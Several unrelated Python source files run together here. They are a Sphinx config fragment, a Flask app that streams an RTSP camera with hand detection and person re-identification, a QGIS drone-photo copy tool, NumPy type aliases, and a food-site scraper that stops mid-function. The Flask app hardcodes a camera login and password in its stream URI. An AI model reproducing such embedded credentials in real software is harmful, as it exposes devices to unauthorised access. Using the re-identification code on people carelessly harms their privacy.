# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
html_logo = 'imgs/Logo_light.png'

html_theme_options = {
    # Fix: 'display_version' was listed twice in this dict; duplicate removed.
    'display_version': True,
    'prev_next_buttons_location': 'bottom',
    'style_external_links': False,
    'style_nav_header_background': '#343131',
    'logo_only': True,
    # Toc options
    'collapse_navigation': False,
    'sticky_navigation': True,
    'navigation_depth': 4,
    'includehidden': True,
    'titles_only': False
}

latex_elements = {
    # The paper size ('letterpaper' or 'a4paper').
    'papersize': 'letterpaper',
    # The font size ('10pt', '11pt' or '12pt').
    'pointsize': '11pt',
    # Additional stuff for the LaTeX preamble.
    'preamble': r'''
\usepackage{charter}
\usepackage[defaultsans]{lato}
\usepackage{inconsolata}
''',
}

latex_logo = 'imgs/Logo_color@2x.png'
|
#import matplotlib
#matplotlib.use('Agg')
from flask import Flask, render_template, Response
import sys
import time
import logging
import subprocess
import cv2
from collections import deque
from tracker import Tracker
import numpy as np
from scipy.optimize import linear_sum_assignment as linear_assignment
from pedestrian_detection_ssdlite import api
from reid import cam_reid
from matplotlib import pyplot as plt
#for hand detection
from utils import detector_utils_washhand as detector_utils
import tensorflow as tf
import datetime
import argparse
# load the hand detection graph and set args for hand detection
detection_graph, sess = detector_utils.load_inference_graph()
num_hands_detect = 3
score_thresh = 0.2
# Fix: the original read `cap.get(3), cap.get(4)` here, but `cap` is not
# defined until gen_frames() runs, so the module crashed with a NameError at
# import time. The stream is opened at 640x480 (see open_cam_rtsp call in
# gen_frames), so use those dimensions directly.
im_width, im_height = (640, 480)
# Regions of interest as [(x1, y1), (x2, y2)] corner pairs in frame pixels.
sink_loc = [(440, 359), (504, 452)]
patient_loc = [(126, 358), (226, 481)]
# global variables to be used in the code for tracker
max_age = 5   # drop a tracker after this many consecutive misses
min_hits = 1  # annotate a tracker only after this many hits
app = Flask(__name__)

# Log to stdout so messages are visible when running under a container/supervisor.
logging.basicConfig(
    stream=sys.stdout,
    format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',
    datefmt=' %I:%M:%S ',
    level="INFO"
)
logger = logging.getLogger('detector')
# Dead code kept as an unused string literal: a superseded version of
# open_cam_onboard (the live one below also supports nvarguscamerasrc).
'''
def open_cam_onboard(width, height):
    # On versions of L4T prior to 28.1, add 'flip-method=2' into gst_str
    gst_str = ('nvcamerasrc ! '
               'video/x-raw(memory:NVMM), '
               'width=(int)2592, height=(int)1458, '
               'format=(string)I420, framerate=(fraction)30/1 ! '
               'nvvidconv ! '
               'video/x-raw, width=(int){}, height=(int){}, '
               'format=(string)BGRx ! '
               'videoconvert ! appsink').format(width, height)
    return cv2.VideoCapture(gst_str, cv2.CAP_GSTREAMER)
'''
# Person re-identification model and gallery of known identities.
reid_mode = cam_reid.reid_model()
# encode origin image
compare = cam_reid.Compare(model=reid_mode, origin_img="./image/origin")
origin_f, origin_name = compare.encode_origin_image()

tracker_list = []  # list for trackers
# list for track ID; IDs are recycled when a tracker is deleted
track_id_list = deque(['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K'])
def open_cam_onboard(width, height):
    """Open the Jetson onboard CSI camera through a GStreamer pipeline.

    Picks the source element matching the installed L4T release and scales
    the stream to ``width`` x ``height``.

    :raises RuntimeError: when no known onboard camera source is available
    :return: cv2.VideoCapture bound to the GStreamer pipeline
    """
    available = str(subprocess.check_output('gst-inspect-1.0'))
    if 'nvcamerasrc' in available:
        # On versions of L4T prior to 28.1, add 'flip-method=2' into gst_str
        pipeline = (
            'nvcamerasrc ! '
            'video/x-raw(memory:NVMM), '
            'width=(int)2592, height=(int)1458, '
            'format=(string)I420, framerate=(fraction)30/1 ! '
            'nvvidconv ! '
            'video/x-raw, width=(int){}, height=(int){}, '
            'format=(string)BGRx ! '
            'videoconvert ! appsink'
        ).format(width, height)
    elif 'nvarguscamerasrc' in available:
        pipeline = (
            'nvarguscamerasrc ! '
            'video/x-raw(memory:NVMM), '
            'width=(int)1920, height=(int)1080, '
            'format=(string)NV12, framerate=(fraction)30/1 ! '
            'nvvidconv flip-method=0 ! '
            'video/x-raw, width=(int){}, height=(int){}, '
            'format=(string)BGRx ! '
            'videoconvert ! appsink'
        ).format(width, height)
    else:
        raise RuntimeError('onboard camera source not found!')
    return cv2.VideoCapture(pipeline, cv2.CAP_GSTREAMER)
def open_cam_rtsp(uri, width, height, latency):
    """Open an RTSP H.264 stream decoded on the Jetson hardware decoder.

    :param uri: RTSP URL including credentials
    :param width: output frame width in pixels
    :param height: output frame height in pixels
    :param latency: jitter-buffer latency in milliseconds
    :return: cv2.VideoCapture bound to the GStreamer pipeline
    """
    pipeline = (
        'rtspsrc location={} latency={} ! '
        'rtph264depay ! h264parse ! omxh264dec ! '
        'nvvidconv ! '
        'video/x-raw, width=(int){}, height=(int){}, '
        'format=(string)BGRx ! '
        'videoconvert ! appsink'
    ).format(uri, latency, width, height)
    return cv2.VideoCapture(pipeline, cv2.CAP_GSTREAMER)
def box_iou2(a, b):
    """
    Ratio between the intersection and the union of two boxes.

    Each box is given as corner pairs: [(left, top), (right, bottom)].

    :return: IoU in [0, 1] as a float
    """
    inter_w = np.maximum(0, (np.minimum(a[1][0], b[1][0]) - np.maximum(a[0][0], b[0][0])))
    inter_h = np.maximum(0, (np.minimum(a[1][1], b[1][1]) - np.maximum(a[0][1], b[0][1])))
    inter_area = inter_w * inter_h
    area_a = (a[1][0] - a[0][0]) * (a[1][1] - a[0][1])
    area_b = (b[1][0] - b[0][0]) * (b[1][1] - b[0][1])
    return float(inter_area) / (area_a + area_b - inter_area)
def assign_detections_to_trackers(trackers, detections, iou_thrd=0.3):
    '''
    From current list of trackers and new detections, output matched detections,
    unmatched trackers, unmatched detections.

    :param trackers: list of tracker boxes as [(x1, y1), (x2, y2)] pairs
    :param detections: list of detection boxes in the same format
    :param iou_thrd: matches below this IOU are treated as unmatched
    :return: (matches Nx2 array of [tracker_idx, detection_idx],
              unmatched detection indices, unmatched tracker indices)
    '''
    IOU_mat = np.zeros((len(trackers), len(detections)), dtype=np.float32)
    for t, trk in enumerate(trackers):
        for d, det in enumerate(detections):
            IOU_mat[t, d] = box_iou2(trk, det)
    # Solve the maximize-sum-of-IOU assignment problem using the
    # Hungarian algorithm (also known as Munkres algorithm); negate because
    # linear_sum_assignment minimizes cost.
    matched_idx_tra, matched_idx_det = linear_assignment(-IOU_mat)
    # Fix: dtype was np.int8, which silently overflows once an index
    # exceeds 127; np.intp holds any valid array index.
    matched_idx = np.zeros((len(matched_idx_tra), 2), dtype=np.intp)
    for i in range(len(matched_idx_tra)):
        matched_idx[i] = (matched_idx_tra[i], matched_idx_det[i])
    unmatched_trackers, unmatched_detections = [], []
    for t, trk in enumerate(trackers):
        if t not in matched_idx[:, 0]:
            unmatched_trackers.append(t)
    for d, det in enumerate(detections):
        if d not in matched_idx[:, 1]:
            unmatched_detections.append(d)
    matches = []
    # An assigned pair with overlap below iou_thrd signifies an
    # untracked object: demote it to unmatched on both sides.
    for m in matched_idx:
        if IOU_mat[m[0], m[1]] < iou_thrd:
            unmatched_trackers.append(m[0])
            unmatched_detections.append(m[1])
        else:
            matches.append(m.reshape(1, 2))
    if len(matches) == 0:
        matches = np.empty((0, 2), dtype=int)
    else:
        matches = np.concatenate(matches, axis=0)
    return matches, np.array(unmatched_detections), np.array(unmatched_trackers)
def draw_box_label(img, bbox_cv2, box_color=(0, 255, 255), personReID_info=None, show_label=True):
    '''
    Helper function for drawing the bounding boxes and the labels.

    :param img: BGR image to draw on (modified in place and returned)
    :param bbox_cv2: [left, top, right, bottom]
    :param box_color: BGR rectangle colour
    :param personReID_info: dict with a 'personID' key; defaults to Unknown.
        Fix: the default used to be a mutable dict literal shared across
        all calls — replaced with the None-sentinel idiom.
    :param show_label: also draw the ID/coordinate label block when True
    :return: the annotated image
    '''
    if personReID_info is None:
        personReID_info = {'personID': 'Unknown'}
    font = cv2.FONT_HERSHEY_SIMPLEX
    font_size = 0.4
    font_color = (0, 0, 0)
    left, top, right, bottom = bbox_cv2[0], bbox_cv2[1], bbox_cv2[2], bbox_cv2[3]
    # Draw the bounding box
    cv2.rectangle(img, (left, top), (right, bottom), box_color, 4)
    if show_label:
        # Draw a filled box on top of the bounding box (as the background for the labels)
        cv2.rectangle(img, (left-2, top-30), (right+2, top), box_color, -1, 1)
        # Output the labels that show the x and y coordinates of the bounding box center.
        text_ID = 'personID:' + personReID_info['personID']
        cv2.putText(img, text_ID, (left, top-20), font, font_size, font_color, 1, cv2.LINE_AA)
        text_x = 'x='+str((left+right)/2)
        cv2.putText(img, text_x, (left, top-10), font, font_size, font_color, 1, cv2.LINE_AA)
        text_y = 'y='+str((top+bottom)/2)
        cv2.putText(img, text_y, (left, top), font, font_size, font_color, 1, cv2.LINE_AA)
    return img
def handle_frames(frame):
    """Run hand and person detection on one frame, update the global
    trackers (Kalman + re-identification), and draw all annotations.

    :param frame: BGR image array from the capture device
    :return: the same frame with boxes and labels drawn on it
    """
    # Tracker state is shared across calls through module-level globals.
    global tracker_list
    global max_age
    global min_hits
    global track_id_list
    # detect hand
    boxes, scores = detector_utils.detect_objects(frame,
                                                  detection_graph, sess)
    # draw bounding boxes on frame
    detector_utils.draw_box_on_image_washhand(num_hands_detect, score_thresh,
                                              scores, boxes, im_width, im_height,
                                              frame, sink_loc, patient_loc)
    # detect person; indexing below implies results are [(x1, y1), (x2, y2)]
    # corner pairs — TODO confirm against pedestrian_detection_ssdlite.api
    detection_results = api.get_person_bbox(frame, thr=0.5)
    x_box = []
    if len(tracker_list) > 0:
        for trk in tracker_list:
            x_box.append([(trk.box[0], trk.box[1]), (trk.box[2], trk.box[3])])  # should be changed into the right format instead of the .box format
    matched, unmatched_dets, unmatched_trks = assign_detections_to_trackers(x_box, detection_results, iou_thrd=0.2)
    # Deal with matched detections: correct each tracker with its measurement.
    if matched.size > 0:
        for trk_idx, det_idx in matched:
            z = detection_results[det_idx]
            # flatten the corner pairs into a 4x1 measurement column vector
            z = np.expand_dims([n for a in z for n in a], axis=0).T
            tmp_trk = tracker_list[trk_idx]
            tmp_trk.kalman_filter(z)
            # x_state appears to interleave positions and velocities
            # [x1, vx1, y1, vy1, x2, vx2, y2, vy2] — keep positions only
            xx = tmp_trk.x_state.T[0].tolist()
            xx = [xx[0], xx[2], xx[4], xx[6]]
            x_box[trk_idx] = xx
            tmp_trk.box = xx
            tmp_trk.hits += 1
            tmp_trk.no_losses = 0
    # Deal with unmatched detections: re-identify the person, spawn a tracker.
    if len(unmatched_dets) > 0:
        for idx in unmatched_dets:
            z = detection_results[idx]
            x1 = int(z[0][0])
            y1 = int(z[0][1])
            x2 = int(z[1][0])
            y2 = int(z[1][1])
            person = frame[y1:y2, x1:x2, :]
            identify_name, score = compare.run(person, origin_f, origin_name)
            # collapse the per-photo gallery labels into a single person label
            if(identify_name in [ "MJ1", "MJ2", "MJ3", "MJ4", "MJ5"]):
                identify_name = "Person_1"
            elif(identify_name in ["QY1", "QY2", "QY3", "QY4", "QY5"]):
                identify_name = "Person_2"
            print("identify name:{}, score:{}".format(identify_name, round(1-score, 2)))
            # generate a new tracker for the person
            z = np.expand_dims([n for a in z for n in a], axis=0).T
            tmp_trk = Tracker()  # Create a new tracker
            x = np.array([[z[0], 0, z[1], 0, z[2], 0, z[3], 0]]).T
            tmp_trk.x_state = x
            tmp_trk.predict_only()
            xx = tmp_trk.x_state
            xx = xx.T[0].tolist()
            xx = [xx[0], xx[2], xx[4], xx[6]]
            tmp_trk.box = xx
            tmp_trk.id = track_id_list.popleft()  # assign an ID for the tracker
            tmp_trk.personReID_info['personID'] = identify_name  # assign the reidentified personID for the tracker
            tracker_list.append(tmp_trk)
            x_box.append(xx)
    # Deal with unmatched tracks: coast on prediction and count the miss.
    if len(unmatched_trks) > 0:
        for trk_idx in unmatched_trks:
            tmp_trk = tracker_list[trk_idx]
            tmp_trk.no_losses += 1
            tmp_trk.predict_only()
            xx = tmp_trk.x_state
            xx = xx.T[0].tolist()
            xx = [xx[0], xx[2], xx[4], xx[6]]
            tmp_trk.box = xx
            x_box[trk_idx] = xx
    # The list of tracks to be annotated and draw the figure
    good_tracker_list = []
    for trk in tracker_list:
        if ((trk.hits >= min_hits) and (trk.no_losses <= max_age)):
            good_tracker_list.append(trk)
            x_cv2 = trk.box
            trackerID_str = "Unknown Person:" + str(trk.id)
            if trk.personReID_info['personID'] == "Unknown":
                frame = draw_box_label(frame, x_cv2, personReID_info={'personID': trackerID_str})  # Draw the bounding boxes for unknown person
            else:
                frame = draw_box_label(frame, x_cv2, personReID_info=trk.personReID_info)  # Draw the bounding boxes for re-identified person
    # book keeping: recycle IDs of expired tracks and prune the tracker list
    deleted_tracks = filter(lambda x: x.no_losses > max_age, tracker_list)
    for trk in deleted_tracks:
        track_id_list.append(trk.id)
    tracker_list = [x for x in tracker_list if x.no_losses <= max_age]
    # #the original codes
    # for bbox in detection_results:
    #     logger.info('coordinates: {} {}. '.
    #                 format(bbox[0], bbox[1]))
    #     x1 = int(bbox[0][0])
    #     y1 = int(bbox[0][1])
    #     x2 = int(bbox[1][0])
    #     y2 = int(bbox[1][1])
    #     person = frame[y1:y2, x1:x2, :]
    #     identify_name, score = compare.run(person, origin_f, origin_name)
    #     if(identify_name in [ "MJ1", "MJ2", "MJ3", "MJ4", "MJ5"]):
    #         identify_name = "Person_1"
    #     elif(identify_name in ["QY1", "QY2", "QY3", "QY4", "QY5"]):
    #         identify_name = "Person_2"
    #
    #     print("identify name:{}, score:{}".format(identify_name, round(1-score, 2)))
    #
    #     bounding_boxs.append([(x1,y1), (x2,y2), identify_name+' '+str(round(1-score, 2))])
    #     #img = cam_detection.draw_rectangle(img, (x1,y1,x2,y2), identify_name+' '+str(round((1-score), 2)))
    # for obj in bounding_boxs:
    #     print(obj)
    #     cv2.putText(frame, obj[2], (obj[0][0], obj[0][1] - 5), cv2.FONT_HERSHEY_PLAIN, 1, (0, 255, 0), 2)
    #     frame = cv2.rectangle(frame, obj[0], obj[1], (0, 255, 0), 2)
    return frame
def gen_frames():  # generate frame by frame from camera
    """Generator yielding annotated JPEG frames as a multipart MJPEG stream.

    Opens the RTSP camera, runs detection/tracking on roughly every 5th
    frame, and yields each processed frame wrapped in multipart boundaries
    for Flask's Response.
    """
    #stream detection
    #cap = open_cam_onboard(640, 480)
    #uri = "rtsp://admin:admin@192.168.1.106:554/stream2"
    uri = "rtsp://admin:edge1234@192.168.1.110:554/cam/realmonitor?channel=1&subtype=1"
    cap = open_cam_rtsp(uri, 640, 480, 200)
    if not cap.isOpened():
        sys.exit('Failed to open camera!')
    # allow the camera to warmup
    #time.sleep(0.1)
    frame_rate_calc = 1
    #freq = cv2.getTickFrequency()
    #print(freq)\
    counter = 0
    while (cap.isOpened()):
        #t1 = cv2.getTickCount()
        counter += 1
        #if counter % 12 !=0:
        #    print(counter)
        #    continue
        t1 = time.time()
        print ("before read:", time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))
        # NOTE(review): frames are read on the 4 iterations between multiples
        # of 5 and only *processed* on every 5th iteration, which reuses the
        # most recently read frame; `ret` is never checked, so a failed read
        # would propagate a stale/invalid frame — confirm this is intended.
        if counter % 5 != 0:
            ret, frame = cap.read()
            print ("after read", time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))
            continue
        logger.info("FPS: {0:.2f}".format(frame_rate_calc))
        #cv2.putText(frame, "FPS: {0:.2f}".format(frame_rate_calc), (20, 20),
        #            cv2.FONT_HERSHEY_PLAIN, 1, (255, 255, 0), 2, cv2.LINE_AA)
        #result = api.get_person_bbox(frame, thr=0.6) #add functions to this line
        frame = handle_frames(frame)
        print ("after handle", time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()))
        t2 = time.time()
        print("one frame takes {0:.2f}".format(t2-t1))
        frame_rate_calc = 1 / (t2 - t1)
        #if frame_rate_calc < 15:
        #    frame_rate_calc = 2*frame_rate_calc
        cv2.putText(frame, "FPS: {0:.2f}".format(frame_rate_calc), (20, 20),
                    cv2.FONT_HERSHEY_PLAIN, 1, (255, 255, 0), 2, cv2.LINE_AA)
        #if counter < 5:
        #    plt.imshow(frame[:, :, ::-1])
        #    plt.show()
        #    continue
        # show the frame
        #cv2.imshow("Stream from EdgeNX1", frame)
        #key = cv2.waitKey(1) & 0xFF
        #t2 = cv2.getTickCount()
        #time1 = (t2 - t1) / freq
        #frame_rate_calc = 1 / time1
        #print("one frame takes {0:.2f}".format(t2-t1))
        # JPEG-encode and emit one multipart chunk per processed frame.
        (flag, outputFrame) = cv2.imencode(".jpg", frame)
        yield (b'--frame\r\n'
               b'Content-Type: image/jpeg\r\n\r\n' + bytearray(outputFrame) + b'\r\n')
        # if the `q` key was pressed, break from the loop
        #if key == ord("q"):
        #    break
@app.route('/video_feed')
def video_feed():
    """Video streaming route. Put this in the src attribute of an img tag."""
    stream = gen_frames()
    return Response(stream, mimetype='multipart/x-mixed-replace; boundary=frame')
@app.route('/')
def index():
    """Video streaming home page."""
    page = render_template('index.html')
    return page
if __name__ == '__main__':
    # Smoke-test the pipeline on a single still image before serving.
    img = cv2.imread('example.jpg')
    img = handle_frames(img)
    #plt.imshow(img[:, :, ::-1])
    print("show frame")
    #plt.show()
    # Serve the MJPEG stream on all interfaces.
    app.run(host='0.0.0.0', port='5000')
    #gen_frames()
|
# -*- coding: utf-8 -*-
"""
Drone_copySelectedPhotos.py
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Leandro França'
__date__ = '2021-11-07'
__copyright__ = '(C) 2021, Leandro França'
from qgis.PyQt.QtCore import QCoreApplication
from qgis.core import (QgsApplication,
QgsProcessingParameterVectorLayer,
QgsGeometry,
QgsProcessing,
QgsProcessingParameterField,
QgsProcessingParameterString,
QgsProcessingParameterEnum,
QgsProcessingParameterBoolean,
QgsProcessingParameterFile,
QgsFeatureSink,
QgsProcessingException,
QgsProcessingAlgorithm,
QgsProcessingParameterFeatureSource,
QgsProcessingParameterFeatureSink)
from lftools.geocapt.imgs import Imgs
import os, shutil
from qgis.PyQt.QtGui import QIcon
class CopySelectedPhotos(QgsProcessingAlgorithm):
    """QGIS Processing algorithm: copy or move the files referenced by the
    selected features of a point layer into a destination folder."""

    # Two-letter QGIS locale code, used to pick English or Portuguese strings.
    LOC = QgsApplication.locale()[:2]

    def translate(self, string):
        # Route a string through the QGIS 'Processing' translation context.
        return QCoreApplication.translate('Processing', string)

    def tr(self, *string):
        # Translate to Portuguese: arg[0] - English (translate), arg[1] - Portuguese
        if self.LOC == 'pt':
            if len(string) == 2:
                return string[1]
            else:
                return self.translate(string[0])
        else:
            return self.translate(string[0])

    def createInstance(self):
        return CopySelectedPhotos()

    def name(self):
        # Unique machine id of the algorithm.
        return 'copyselectedphotos'

    def displayName(self):
        return self.tr('Copy selected files', 'Copiar arquivos selecionados')

    def group(self):
        return self.tr('Drones')

    def groupId(self):
        return 'drones'

    def tags(self):
        return self.tr('drones,fotografia,photography,blocks,copy,copiar,separate,separar,organize,organizar,filtrar,filter').split(',')

    def icon(self):
        return QIcon(os.path.join(os.path.dirname(os.path.dirname(__file__)), 'images/drone.png'))

    # Help texts (English / Portuguese) and tutorial figure for the dialog.
    txt_en = 'This tool makes it possible to copy or move files to a new folder from a point layer with file paths.'
    txt_pt = 'Esta ferramenta possibilita copiar ou mover arquivos para uma nova pasta a partir de uma camada de pontos com os caminhos dos arquivos.'
    figure = 'images/tutorial/drone_copySelectedFiles.jpg'

    def shortHelpString(self):
        # HTML footer with the tutorial figure and author credit.
        social_BW = Imgs().social_BW
        footer = '''<div align="center">
<img src="'''+ os.path.join(os.path.dirname(os.path.dirname(__file__)), self.figure) +'''">
</div>
<div align="right">
<p align="right">
<b>'''+self.tr('Author: Leandro Franca', 'Autor: Leandro França')+'''</b>
</p>'''+ social_BW + '''</div>
</div>'''
        return self.tr(self.txt_en, self.txt_pt) + footer

    # Parameter keys.
    POINTS = 'POINTS'
    FILEPATH = 'FILEPATH'
    OPTION = 'OPTION'
    FOLDER = 'FOLDER'

    def initAlgorithm(self, config=None):
        # Point layer whose features reference the files to copy/move.
        self.addParameter(
            QgsProcessingParameterVectorLayer(
                self.POINTS,
                self.tr('Points', 'Pontos'),
                [QgsProcessing.TypeVectorPoint]
            )
        )
        # String field holding the absolute path of each file.
        self.addParameter(
            QgsProcessingParameterField(
                self.FILEPATH,
                self.tr('Field with file path', 'Campo com o caminho do arquivo'),
                parentLayerParameterName=self.POINTS,
                type=QgsProcessingParameterField.String
            )
        )
        # 0 = copy, 1 = move (see processAlgorithm).
        opt = [self.tr('Copy','Copiar'),
               self.tr('Move','Mover')
              ]
        self.addParameter(
            QgsProcessingParameterEnum(
                self.OPTION,
                self.tr('Option', 'Opção'),
                options = opt,
                defaultValue= 0
            )
        )
        # Destination folder.
        self.addParameter(
            QgsProcessingParameterFile(
                self.FOLDER,
                self.tr('Folder with raster files', 'Pasta com arquivos raster'),
                behavior=QgsProcessingParameterFile.Folder,
                defaultValue=None
            )
        )

    def processAlgorithm(self, parameters, context, feedback):
        pontos = self.parameterAsVectorLayer(
            parameters,
            self.POINTS,
            context
        )
        if pontos is None:
            raise QgsProcessingException(self.invalidSourceError(parameters, self.POINTS))

        campo = self.parameterAsFields(
            parameters,
            self.FILEPATH,
            context
        )
        if campo is None:
            raise QgsProcessingException(self.invalidSourceError(parameters, self.FILEPATH))
        columnIndex = pontos.fields().indexFromName(campo[0])

        opcao = self.parameterAsEnum(
            parameters,
            self.OPTION,
            context
        )

        destino = self.parameterAsFile(
            parameters,
            self.FOLDER,
            context
        )
        if not destino:
            raise QgsProcessingException(self.invalidSourceError(parameters, self.FOLDER))

        # Check that at least one feature is selected
        if pontos.selectedFeatureCount() <1:
            raise QgsProcessingException(self.tr('At least one feature must be selected!', 'Pelo menos uma feição deve ser selecionada!'))

        # Copy (or move) the selected files to the destination folder
        total = 100.0 / pontos.selectedFeatureCount()
        cont = 1
        for pnt in pontos.getSelectedFeatures():
            origem = pnt[columnIndex]
            nome = os.path.split(origem)[-1]
            if opcao == 0:
                shutil.copy2(origem, os.path.join(destino, nome))
            elif opcao == 1:
                shutil.move(origem, os.path.join(destino, nome))
            if feedback.isCanceled():
                break
            feedback.setProgress(int((cont) * total))
            cont += 1

        feedback.pushInfo(self.tr('Operation completed successfully!', 'Operação finalizada com sucesso!'))
        feedback.pushInfo(self.tr('Leandro Franca - Cartographic Engineer', 'Leandro França - Eng Cart'))
        return {}
|
from typing import Literal, Sequence, SupportsFloat, SupportsInt, Union

# Fix: ``int0`` was a deprecated alias of ``intp`` removed in NumPy 2.0;
# import ``intp`` (same underlying type) so this module works on all
# supported NumPy versions.
from numpy import (float16, float32, float64, int8, int16, int32, int64,
                   intp, ndarray)
from pandas import DataFrame, Series

# Numerical
NumpyFloat = Union[float64, float32, float16]  # Numpy Float types
NumpyInt = Union[intp, int8, int16, int32,
                 int64]  # Numpy Int types
BuiltinNumbers = Union[int, float]  # Builtin number types
# Any numerical, or numpy numerical types
Numerical = Union[BuiltinNumbers, NumpyFloat, NumpyInt, SupportsInt, SupportsFloat]
Int = Union[NumpyInt, int]

# External types for set-like objects
ExternalSets = Union[DataFrame, Series, ndarray]
BuiltinSets = Union[list, tuple, set]  # Builtin set-like types
SequentialObject = Union[ExternalSets, BuiltinSets]  # All set-like objects
# A Union of sequences that can be used alongside numerical values
Data = Union[SequentialObject, Numerical]
X_Data = Sequence[Sequence[Numerical]]

# Maths Types
Distance = Literal["euclidean", "manhattan"]  # Distance function names
|
import json
import re
import os
from time import sleep
from requests_html import HTMLSession
from selenium import webdriver as wb
# Shared HTTP session for scraping foody.vn pages.
session = HTMLSession()
# Regexes that extract the embedded JSON blobs from page source.
text_re = r"jsonData = (.*);"
regex = r"initData = (.*);"
# Shared Chrome options for all webdriver instances.
options = wb.ChromeOptions()
def crawl_cmt(link, driver_path):
    """Open a foody.vn store page, click "load more" until all comments are
    shown, and return the concatenated comment text.

    :param link: URL of the store's review page
    :param driver_path: path to the chromedriver executable
    :return: all comment text joined into one string
    """
    # Local import: the find_elements_by_xpath helpers were removed in
    # Selenium 4; find_elements(By.XPATH, ...) works on Selenium 3 and 4.
    # NOTE(review): ``executable_path`` is itself removed in Selenium >= 4.10
    # (use Service) — confirm the pinned selenium version.
    from selenium.webdriver.common.by import By

    driver = wb.Chrome(executable_path=driver_path, options=options)
    driver.get(link)
    while True:
        try:
            load_more = driver.find_elements(
                By.XPATH,
                '/html/body/div[2]/div[2]/div[2]/section/div/div/div/div/div[1]/div/div[2]/div[1]/div/div/a')
            load_more[0].click()
        except IndexError:
            # No "load more" link left: every comment is on the page.
            print("Load full cmt")
            break
    full_cmt = driver.find_elements(
        By.XPATH,
        '/html/body/div[2]/div[2]/div[2]/section/div/div/div/div/div[1]/div/div[2]/div[1]/div/ul')
    full_cmt_by_text = ''
    for k in full_cmt:
        full_cmt_by_text = full_cmt_by_text + k.text
    driver.close()
    return full_cmt_by_text
def get_full_menu(store_link, driver_path):
    """Load a now.vn store page zoomed out so all menu rows render, and
    return their concatenated text.

    :param store_link: URL of the store's menu page
    :param driver_path: path to the chromedriver executable
    :return: menu text of all 'item-restaurant-row' elements
    """
    # Local import: the find_elements_by_class_name helper was removed in
    # Selenium 4; find_elements(By.CLASS_NAME, ...) works on Selenium 3 and 4.
    from selenium.webdriver.common.by import By

    driver1 = wb.Chrome(executable_path=driver_path, options=options)
    # Zoom far out so lazily-rendered menu rows all enter the viewport.
    driver1.get('chrome://settings/')
    driver1.execute_script('chrome.settingsPrivate.setDefaultZoom(0.1);')
    sleep(1)
    driver1.get(store_link)
    sleep(1)
    # change zoom for web driver
    sleep(1)
    driver1.execute_script("document.body.style.zoom='50%'")
    driver1.get(store_link)
    sleep(1)
    menu_data = driver1.find_elements(By.CLASS_NAME, 'item-restaurant-row')
    menu: str = ''
    for k in menu_data:
        menu = menu + k.text
    driver1.close()
    return menu
"""
Function name: Get_menu
:param val: Str
:return: res: dict
Format: {"data": [<sub_format>]}
Sub_format:
name: Str: dish's name
price: Str: dish's price
details: Str: additional information about dishes
"""
def get_menu(val):
    """Parse raw menu text (one field per line) into a dict.

    Lines are consumed per record as: a dish name (optionally prefixed with
    "+" or "Hết hàng"/out-of-stock), then optional detail lines, then a price
    line (starts with a digit, ends with "đ") which closes the record.

    :param val: newline-separated text scraped from the menu page
    :return: {'data': [{'name': str, 'price': str, 'details': str|None}, ...]}
    """
    menu_list = val.split('\n')
    res = {'data': []}
    cur = {'details': None}
    count_param = 0
    for cmt in menu_list:
        if count_param == 0:
            # First line of a record is the dish name; strip known prefixes.
            if cmt.startswith("+"):
                cur['name'] = cmt[1:]
            elif cmt.startswith("Hết hàng"):
                cur['name'] = cmt[8:]
            else:
                # Fix: this branch was "elif count_param == 0", which is
                # always true here — a plain else with the same behavior.
                cur['name'] = cmt
            count_param += 1
        else:
            # Fix: guard against empty lines; cmt[0] / cmt[-1] raised
            # IndexError on input with a trailing newline.
            if cmt and '0' <= cmt[0] <= '9' and cmt[-1] == 'đ':
                # Price line closes the record; drop thousands separators.
                cur['price'] = cmt.replace(',', '')
                res['data'].append(cur)
                cur = {'details': None}
                count_param = 0
            else:
                cur['details'] = cmt
    return res
"""
Function name: Get_cmt
parse comment
:param val: Str
:return: res: dict:
Format: {"data": [<sub_format>]}
Sub_format:
name: Str: customer name
rate: Float: customer rate for diner
device: customer device use to comment
cmt: content of the comment
"""
def get_cmt(val):
    """Parse scraped review text into structured comment records.

    :param val: newline-separated text from the reviews page
    :return: {'data': [{'rate': float, 'name': str, 'device': str,
                        'cmt': str, 'details': str|None}, ...]}
    """
    records = {'data': []}
    current = {'details': None}
    field_idx = 0
    for line in val.split('\n'):
        if line in ("Thích", "Thảo luận", "Báo lỗi"):
            # Action-bar caption marks the end of a comment block.
            if field_idx > 0:
                records['data'].append(current)
                current = {'details': None}
                field_idx = 0
        elif line.startswith("- Đây"):
            # Trailing note: attach it and close the record immediately.
            current['details'] = line
            records['data'].append(current)
            current = {'details': None}
            field_idx = 0
        else:
            if field_idx == 0:
                # The rating is expected as a 3-character string such as
                # "9.2"; other lines before the rating are skipped.
                if len(line) != 3:
                    continue
                current['rate'] = float(line)
            elif field_idx == 1:
                current['name'] = line
            elif field_idx == 2:
                current['device'] = line
            elif field_idx == 3:
                current['cmt'] = line
            else:
                # Extra lines are folded into the comment body.
                current['cmt'] += line
            field_idx += 1
    return records
def get_full_information(store_link, driver_path):
    """Collect a store's profile (opening times, ratings, menu) from
    foody.vn / now.vn.

    :param store_link: store path fragment, e.g. "/ho-chi-minh/some-store"
    :param driver_path: path to the chromedriver executable
    :return: dict with the store information, or None on failure
    """
    link_foody_store = 'https://www.foody.vn{}'.format(store_link)
    link_menu = 'https://www.now.vn{}'.format(store_link)
    # cmt = crawl_cmt(link_foody_store, driver_path)
    menu = get_full_menu(link_menu, driver_path)
    rb = session.get(link_foody_store)
    store_inf_text_link: str = rb.text
    # print(text_re.match(text_str))
    # Pull the "initData = {...};" JSON blob out of the page source; the loop
    # keeps only the last captured group.
    matches = re.finditer(regex, store_inf_text_link, re.MULTILINE)
    need_data = ''
    for matchNum, match in enumerate(matches, start=1):
        for groupNum in range(0, len(match.groups())):
            groupNum = groupNum + 1
            need_data = match.group(groupNum)
    # print(r.text)
    # NOTE(review): if the regex matched nothing, need_data is '' and this
    # raises json.JSONDecodeError — confirm callers tolerate that.
    data = json.loads(need_data)
    # Format opening hours as "H:M-H:M" strings.
    time_do = []
    for k in data['OpeningTime']:
